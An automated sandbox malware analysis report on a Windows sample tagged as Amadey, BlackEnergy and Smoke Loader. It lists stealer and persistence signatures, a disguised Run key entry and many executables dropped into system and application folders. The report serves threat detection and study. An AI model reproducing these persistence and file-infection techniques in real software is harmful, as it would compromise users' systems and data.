Malware Analysis Report

2025-08-10 20:04

Sample ID 250704-pcafdsswbw
Target 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop
SHA256 0dacb1d51560612a2f24f0c64b40aabc49d9b9522a05a930df299b8f540af440
Tags
adware discovery persistence spyware stealer
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

0dacb1d51560612a2f24f0c64b40aabc49d9b9522a05a930df299b8f540af440

Threat Level: Shows suspicious behavior

The file 2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop was found to be: Shows suspicious behavior.

Malicious Activity Summary

adware discovery persistence spyware stealer

Reads user/profile data of web browsers

Adds Run key to start application

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-07-04 12:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-07-04 12:10

Reported

2025-07-04 12:13

Platform

win10v2004-20250619-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\ComputerDefaults.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\msra.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\RMActivate_ssp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ROUTE.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesPerformance.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\UserAccountControlSettings.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\at.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dcomcnfg.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\regsvr32.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\verifiergui.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\EhStorAuthn.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\explorer.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\NetCfgNotifyObjectHost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\userinit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\logman.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\sdchange.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wowreg32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\fontdrvhost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\hdwwiz.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ktmutil.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\runas.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dxdiag.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\hh.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\hh.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SystemPropertiesDataExecutionPrevention.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wiaacmgr.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Fondue.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\IMETC\IMTCPROP.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\Msdtc\Trace\msdtcvtr.bat- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\RMActivate_isv.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SecEdit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SettingSyncHost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\sfc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\typeperf.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cmdl32.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wbem\WMIADAP.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\grpconv.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\sdbinst.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\chkdsk.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\dccw.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\ipconfig.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\LaunchTM.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\runonce.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\certutil.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\credwiz.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\diskperf.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\EaseOfAccessDialog.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\IMETC\IMTCLNWZ.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\IME\SHARED\IMESEARCH.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\mmgaserver.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\newdev.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\cmd.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\print.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\bthudtask.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\LaunchWinApp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\msfeedssync.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\openfiles.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\poqexec.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\SyncHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\tasklist.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wlanext.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SysWOW64\wbem\WmiPrvSE.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\Office16\msoia.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\rmic.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\jabswitch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\PilotshubApp.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\msoev.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\elevation_service.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_pwa_launcher.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javaws.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jps.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\misc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Microsoft.WebMediaExtensions.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\msedge.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\misc.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\Download\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\133.0.3065.69\MicrosoftEdge_X64_133.0.3065.69.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javac.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\javah.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\java.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pptico.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\GetHelp.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\Download\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\133.0.3065.69\MicrosoftEdge_X64_133.0.3065.69.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmpnetwk.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\grv_icons.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstaller.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\7-Zip\7zFM.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmprph.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Acrobat- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\pwahelper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\dotnet.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\java-rmi.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmpshare.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\identity_helper.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\MicrosoftEdgeUpdateSetup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\orbd.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaws.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\native2ascii.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
